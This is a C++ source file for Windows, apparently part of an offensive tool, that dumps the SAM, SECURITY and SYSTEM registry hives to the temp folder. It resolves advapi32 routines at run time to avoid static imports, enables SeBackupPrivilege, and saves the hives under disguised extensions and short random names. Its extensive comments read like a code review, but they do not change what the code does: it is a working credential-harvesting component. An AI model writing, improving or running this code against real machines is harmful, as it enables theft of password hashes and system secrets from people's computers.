#include "startproc.h"

#include <Windows.h>

#include <chrono>
#include <cwchar>
#include <iostream>
#include <string>
#include <utility>
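// Resolve an exported function from a DLL at run time (this file uses it to
// avoid static imports of the advapi32 routines it calls).
//
// lib  - DLL name or path passed to LoadLibraryA. A bare name follows the
//        normal DLL search order; that is acceptable for the system DLLs this
//        file asks for, but anything else should be given as a full path (or
//        loaded with LoadLibraryExA search flags) to avoid search-order
//        hijacking.
// func - exported symbol name.
// Returns the function address, or nullptr after writing a diagnostic to
// stderr (the other error paths in this file also use stderr).
//
// The module reference taken by LoadLibraryA is never released; for a system
// DLL that is already mapped into the process this is harmless.
FARPROC ResolveFunc(const char* lib, const char* func) {
    if (!lib || !func) return nullptr;

    HMODULE hMod = LoadLibraryA(lib);
    if (!hMod) {
        // Capture the error before any stream I/O can overwrite it.
        const DWORD err = GetLastError();
        std::cerr << "[-] Failed to load DLL: " << lib
                  << ", Error: " << err << std::endl;
        return nullptr;
    }

    FARPROC fp = GetProcAddress(hMod, func);
    if (!fp) {
        const DWORD err = GetLastError();
        std::cerr << "[-] Function not found: " << func
                  << ", Error: " << err << std::endl;
    }
    return fp;
}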
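// Report whether the current process token is elevated (TokenElevation).
//
// Returns FALSE on any failure — including when OpenProcessToken cannot be
// resolved, when the token cannot be opened, or when the query fails — so a
// failure to determine the state is treated as "not elevated". Note that an
// elevated token does not by itself mean a given privilege (e.g. the one
// hiveDump needs) is enabled; see enPrivilege for that.
BOOL IsElevated() {
    pOpenProcessToken opt =
        (pOpenProcessToken)ResolveFunc("advapi32.dll", "OpenProcessToken");
    if (!opt) return FALSE;  // previously called through a possibly-null pointer

    HANDLE hToken = nullptr;
    if (!opt(GetCurrentProcess(), TOKEN_QUERY, &hToken)) return FALSE;

    TOKEN_ELEVATION elev{};
    DWORD sz = sizeof(elev);
    const BOOL elevated =
        GetTokenInformation(hToken, TokenElevation, &elev, sz, &sz) &&
        elev.TokenIsElevated;

    CloseHandle(hToken);
    return elevated;
}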
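// Enable a single privilege on hToken.
//
// privName   - name of the privilege; used only for diagnostics here (the
//              caller has already looked up its LUID).
// hToken     - token opened with TOKEN_ADJUST_PRIVILEGES.
// lidToCheck - LUID of the privilege to enable.
// Returns 0 when the privilege is now enabled, 1 otherwise (diagnostic on
// stderr).
//
// AdjustTokenPrivileges returns TRUE even when it could NOT enable the
// requested privilege because the token does not hold it; that outcome is only
// reported via GetLastError() == ERROR_NOT_ALL_ASSIGNED. The original ignored
// this, so a token lacking e.g. SeBackupPrivilege (which hiveDump's
// REG_OPTION_BACKUP_RESTORE open depends on) would be reported as enabled and
// the later registry call would fail with a less obvious error.
int enPrivilege(LPCWSTR privName, HANDLE hToken, LUID lidToCheck) {
    pAdjustTokenPrivileges pAtp =
        (pAdjustTokenPrivileges)ResolveFunc("advapi32.dll", "AdjustTokenPrivileges");
    if (!pAtp) return 1;  // ResolveFunc already reported the failure

    TOKEN_PRIVILEGES tp{};
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Luid = lidToCheck;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    if (!pAtp(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) {
        const DWORD err = GetLastError();
        std::cerr << "[-] AdjustTokenPrivileges failed :" << err << std::endl;
        return 1;
    }
    // TRUE with ERROR_NOT_ALL_ASSIGNED means "call succeeded, privilege not
    // granted" — treat it as a failure.
    if (GetLastError() == ERROR_NOT_ALL_ASSIGNED) {
        std::wcerr << L"[-] Privilege not held by token: "
                   << (privName ? privName : L"(null)") << std::endl;
        return 1;
    }

    std::wcout << L"[+] Privilege Enabled" << std::endl;
    return 0;
}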
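// Produce a short upper-case hex token used to name the hive dump file.
//
// a, b - inclusive bounds of the integer that is hex-encoded; the defaults
//        yield a 3–4 character token ("3E8".."270F"). If b < a the bounds are
//        swapped (the original computed t % (b - a + 1), which divides by zero
//        for b == a - 1); negative bounds are clamped to 0 because the digit
//        loop assumes a non-negative value.
//
// This is NOT a secure random value: it is derived from steady_clock, which is
// predictable, and spans only a few thousand names. It merely keeps successive
// dump files from colliding; do not rely on it to hide the file from anyone
// who can list %TEMP%.
std::wstring a2G(int a = 1000, int b = 9999) {
    if (b < a) std::swap(a, b);
    if (a < 0) a = 0;
    if (b < 0) b = 0;

    const long long ticks =
        std::chrono::steady_clock::now().time_since_epoch().count();
    const long long range = static_cast<long long>(b) - a + 1;  // >= 1 here
    // Fold the tick count into [a, b]; the double modulo keeps the remainder
    // non-negative even if the clock ever reports a negative count.
    long long n = a + (((ticks % range) + range) % range);

    static const wchar_t kHex[] = L"0123456789ABCDEF";
    std::wstring out;
    do {
        out.insert(out.begin(), kHex[n % 16]);
        n /= 16;
    } while (n != 0);
    return out;
}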
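// Save one HKLM hive to a file under %TEMP%.
//
// kName - subkey of HKEY_LOCAL_MACHINE to save. "SAM", "SECURITY" and "SYSTEM"
//         get the extensions .bam, .bec and .bsy respectively; any other name
//         is saved with no extension.
// Returns 0 on success, 1 on any failure (diagnostic on stderr).
//
// Opening with REG_OPTION_BACKUP_RESTORE and calling RegSaveKeyExW both rely on
// SeBackupPrivilege being enabled on the calling token (see enPrivilege);
// without it the open or the save fails with an access error. The written file
// holds credential material and is created with the default ACL of %TEMP%
// under a clock-derived name from a2G(); the caller is responsible for removing
// it once it has been consumed.
int hiveDump(LPCWSTR kName) {
    if (!kName) {
        std::wcerr << L"[!] hiveDump: null key name" << std::endl;
        return 1;
    }

    pRegOpenKeyExW rok = (pRegOpenKeyExW)ResolveFunc("advapi32.dll", "RegOpenKeyExW");
    pRegSaveKeyExW rsk = (pRegSaveKeyExW)ResolveFunc("advapi32.dll", "RegSaveKeyExW");
    if (!rok || !rsk) return 1;  // ResolveFunc already logged which one failed

    // Build the destination path before touching the registry so a path
    // failure never leaves a key handle open.
    wchar_t tmpPath[MAX_PATH];
    const DWORD len = GetTempPathW(MAX_PATH, tmpPath);
    if (len == 0) {
        std::wcerr << L"[!] GetTempPathW failed: " << GetLastError() << std::endl;
        return 1;
    }
    if (len > MAX_PATH) {  // buffer too small: tmpPath is not a usable path
        std::wcerr << L"[!] GetTempPathW: temp path longer than MAX_PATH" << std::endl;
        return 1;
    }
    std::wstring filePath = tmpPath;
    filePath += a2G();
    // The original compared the LPCWSTR against literals with ==, which
    // compares pointers and only "works" when the linker happens to pool
    // identical literals; compare the contents instead.
    if (wcscmp(kName, L"SAM") == 0) {
        filePath += L".bam";
    } else if (wcscmp(kName, L"SECURITY") == 0) {
        filePath += L".bec";
    } else if (wcscmp(kName, L"SYSTEM") == 0) {
        filePath += L".bsy";
    }

    HKEY hKey = nullptr;
    LSTATUS status = rok(HKEY_LOCAL_MACHINE, kName, REG_OPTION_BACKUP_RESTORE, READ_CONTROL, &hKey);
    if (status != ERROR_SUCCESS) {
        std::wcerr << L"[!] RegOpenKeyEx failed: " << status << std::endl;
        return 1;
    }

    status = rsk(hKey, filePath.c_str(), NULL, REG_NO_COMPRESSION);
    RegCloseKey(hKey);  // closed on both paths; the original leaked hKey on failure
    if (status != ERROR_SUCCESS) {
        std::wcerr << L"[!] RegSaveKeyExW failed: " << status << std::endl;
        return 1;
    }
    return 0;
}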